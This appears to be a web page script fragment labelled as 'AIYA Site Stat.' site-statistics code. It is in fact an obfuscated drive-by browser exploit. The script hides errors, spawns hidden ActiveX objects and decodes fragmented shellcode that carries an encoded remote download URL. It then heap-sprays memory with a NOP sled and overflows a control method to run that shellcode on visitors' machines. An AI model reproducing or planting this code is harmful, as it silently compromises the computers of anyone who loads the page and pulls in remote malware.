<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<!-- START AIYA Site Stat. -->
<SCRIPT>
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" style=\'display:none\' id=\'Silverlight\'><\/object>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var HEDY1k,HEDY2k,HEDY3k,HEDY4k,HEDY5k,YORKLD,WOLFEF,WOLFDATELK,QuadroXFX;");
document.writeln("var HEDY01,HEDY02,HEDY03,HEDY04,HEDY05,HEDY06,HEDY07,HEDY08,HEDY09,HEDY10;");
document.writeln("var HEDY11,HEDY12,HEDY13,HEDY14,HEDY15,HEDY16,HEDY17,HEDY18,HEDY19,HEDY20;");
document.writeln("HEDY2k = unescape(\"psd2f6e\");\/\/(\"psd746fpsdfb7cpsd1752psd8476psd3b4epsd5362psd3a67psd3760c\");");
document.writeln("HEDY5k = unescape(\"psd0000\");\/\/(\"psd3030psd074epsdcf50psd207dpsdfd80psd4d91psd59fdpsd1521f\");");
document.writeln("HEDY19 = unescape(\"psd2d32\");\/\/(\"psd5c4fpsd3a4epsd227dpsd3c5cpsd7943psd6562psd2d72psd26873\");");
document.writeln("HEDY01 = unescape(\"psd56e8\");\/\/(\"psd0a4epsd5a50psd864epsddb8fpsd004epsd656bpsd8476psd46e7f\");");
document.writeln("HEDY18 = unescape(\"psd312e\");\/\/(\"psd4753psda77epsd0cffpsd6496psd864epsde562psd0967psd53031\");");
document.writeln("HEDY16 = unescape(\"psd6573\");\/\/(\"psd6780psd302fpsd5702psd4e28psd81bapsd8b38psd52c6psd6542b\");");
document.writeln("HEDY1k = unescape(\"psd632e\");\/\/(\"psd5349psd76d8psd9584psd595cpsd4e34psd594bpsdff16psd7540c\");");
document.writeln("HEDY17 = unescape(\"psd3172\");\/\/(\"psd3033psd5730psd6228psd64cdpsd4f44psd757fpsd6528psd897b9\");");
document.writeln("HEDY20 = unescape(\"psd3637\");\/\/(\"psd5262psd51a0psd4e65psd6686psd52f4psd66a0psd807apsdu76fd\");");
document.writeln("HEDY3k = unescape(\"psd6162\"+\"psd316b\");\/\/(\"psd8b57psd0cffpsd3354psd3030psd2857psd2760psd\");");
document.writeln("HEDY4k = unescape(\"psd632e\"+\"psd7373\");\/\/(\"psd7b8cpsd8111psd5f38psd95ebpsd67f8psd803apsd\");");
document.writeln("HEDY13 = unescape(\"psd6c6c\"+\"psde800psdffaepsdffffpsd5255psd444cpsd776fpsd6c6epsd616fpsd5464\");");
document.writeln("HEDY06 = unescape(\"psdc031\"+\"psd5e5fpsd5b5dpsd08c2psd5e00psd306apsd6459psd198bpsd5b8bpsd8b0c\");");
document.writeln("HEDY05 = unescape(\"psd245a\"+\"psdeb01psd8b66psd4b0cpsd5a8bpsd011cpsd8bebpsd8b04psde801psd02eb\");");
document.writeln("HEDY15 = unescape(\"psdffff\"+\"psd2e2epsd785cpsde800psdff89psdffffpsd7468psd7074psd2f3apsd752f\");");
document.writeln("HEDY03 = unescape(\"psd4a8b\"+\"psd8b18psd205apsdeb01psd32e3psd8b49psd8b34psdee01psdff31psd31fc\");");
document.writeln("HEDY04 = unescape(\"psdacc0\"+\"psde038psd0774psdcfc1psd010dpsdebc7psd3bf2psd247cpsd7514psd8be1\");");
document.writeln("HEDY12 = unescape(\"psdff73\"+\"psd6ad6psdff00psde8d0psdffabpsdffffpsd7275psd6d6cpsd6e6fpsd642e\");");
document.writeln("HEDY02 = unescape(\"psd0000\"+\"psd5300psd5655psd8b57psd246cpsd8b18psd3c45psd548bpsd7805psdea01\");");
document.writeln("HEDY08 = unescape(\"psd0e4e\"+\"psdffecpsdebd6psd5a50psdff52psd89d0psd52c2psd5352psdaa68psd0dfc\");");
document.writeln("HEDY11 = unescape(\"psd9868\"+\"psd8afepsdff0epsdebd6psd5944psd006apsdff51psd53d0psd7e68psde2d8\");");
document.writeln("HEDY07 = unescape(\"psd1c5b\"+\"psd1b8bpsd5b8bpsd5308psd8e68psd0e4epsdffecpsd89d6psd53c7psd8e68\");");
document.writeln("HEDY10 = unescape(\"psd5100\"+\"psd6a52psdff00psd53d0psda068psdc9d5psdff4dpsd5ad6psdff52psd53d0\");");
document.writeln("HEDY14 = unescape(\"psd466f\"+\"psd6c69psd4165psde800psdffa0psdffffpsd2e2epsd785cpsde800psdffb7\");");
document.writeln("HEDY09 = unescape(\"psdff7c\"+\"psd5ad6psd4debpsd5159psdff52psdebd0psd5a72psd5bebpsd6a59psd6a00\");");
document.writeln("YORKLD = HEDY01+HEDY02+HEDY03+HEDY04+HEDY05+HEDY06+HEDY07+HEDY08+HEDY09+HEDY10;");
document.writeln("WOLFEF = HEDY11+HEDY12+HEDY13+HEDY14+HEDY15+HEDY16+HEDY17+HEDY18+HEDY19+HEDY20;");
document.writeln("WOLFDATELK = HEDY1k+HEDY2k+HEDY3k+HEDY4k+HEDY5k;");
document.writeln("var MmUrl = unescape(\"%u7468%u7074%u2f3a%u642f%u2e7a%u7375%u6e2e%u7465%u622f%u6b61%u632e%u7373\");");
document.writeln("var QuadroSCR = YORKLD+WOLFEF+WOLFDATELK;");
document.writeln("QuadroXFX = unescape(QuadroSCR.replace(\/psd\/g,\"\\x25\\x75\"));");
document.writeln("var AntiVir = unescape(\"%u9090\"+\"%u9090\");");
document.writeln("var Norton = 20;");
document.writeln("var DrWeb = Norton+QuadroXFX.length;");
document.writeln("while (AntiVir.length<DrWeb) AntiVir+=AntiVir;");
document.writeln("fillblock = AntiVir.substring(0, DrWeb);");
document.writeln("ActivePerl=\"\\x2d\\x44\\x41\\x34\\x31\\x2d\\x34\\x46\\x45\\x45\\x2d\\x38\\x32\\x30\";");
document.writeln("block = AntiVir.substring(0, AntiVir.length-DrWeb);");
document.writeln("getSpraySlide=\"\\x34\\x2d\\x36\\x32\\x41\\x39\\x34\\x45\\x41\\x41\\x32\\x39\\x44\\x31\";");
document.writeln("while(block.length+DrWeb<0x40000) block = block+block+fillblock;");
document.writeln("helloworld2Address=\"\\x63\\x6c\\x73\\x69\\x64\\x3a\\x43\\x31\\x34\\x44\\x30\\x30\\x33\\x41\";");
document.writeln("Mcafee = new window[\"\\x41\\x72\\x72\\x61\\x79\"]();");
document.writeln("Notify=\"\\x6c\\x69\\x73\\x74\";");
document.writeln("start=\"\\x73\\x65\\x72\\x76\\x65\\x72\";");
document.writeln("for (x=0; x<300; x++) Mcafee[x] = block +QuadroXFX;");
document.writeln("buffer=(document.createElement(\"\\x6f\\x62\\x6a\\x65\\x63\\x74\"));");
document.writeln("buffer.setAttribute(\"\\x63\\x6c\\x61\\x73\\x73\\x69\\x64\",helloworld2Address+ActivePerl+getSpraySlide);");
document.writeln("setTimeout(\'Exploit()\', 1000);");
document.writeln("var Agena = \'\';");
document.writeln("var love = unescape(\"%0c\");");
document.writeln("hgs_startNotify=start+Notify;");
document.writeln("while (Agena.length < 1542) Agena+=love;");
document.writeln("buffer[hgs_startNotify](Agena);");
document.writeln("function Exploit()");
document.writeln("{");
document.writeln("var Ewido = \'\';");
document.writeln("while (Ewido.length < 1319) Ewido+=\"A\";");
document.writeln("Ewido=Ewido+\"\\x0a\\x0a\\x0a\\x0a\"+Ewido;");
document.writeln("Silverlight.hgs_startNotify(Ewido);");
document.writeln("}");
document.writeln("<\/script>");
</SCRIPT>